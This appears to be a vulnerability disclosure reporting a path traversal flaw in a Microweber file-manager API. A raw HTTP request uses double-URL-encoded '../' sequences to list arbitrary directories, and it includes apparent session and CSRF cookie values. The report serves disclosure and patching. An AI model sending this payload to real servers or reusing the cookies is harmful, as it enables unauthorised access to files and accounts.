# Description
In `file-manager/list` API, the server does not handling `path` parameters properly lead to allow listing any directory. To exploit, use double URL encoding to bypass filter.
# Proof of Concept
“`
GET /demo/api/file-manager/list?path=%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/ HTTP/1.1
Host: demo.microweber.org
Cookie: remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=2%7CTtYWLvivLcGGOKkv5QqtzWhOA7vw6wZPZIbryyJKGsVNHLLfQ4n75QWDNFH8%7C%242y%2410%24114oPbqv.UAg3ca706prIuSTMe3pAc9qYqT2gOBR1uldB9UTk%2FlYu; back_to_admin=https%3A//demo.microweber.org/demo/admin/; csrf-token-data=%7B%22value%22%3A%22C9vMXphqkoxzEVRFH0KGTbFGUk9B1bo1nbJPMXDQ%22%2C%22expiry%22%3A1656856275047%7D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
X-Pwnfox-Color: red
Te: trailers
Connection: close
“`
# PoC Image
Read More
References
Back to Main
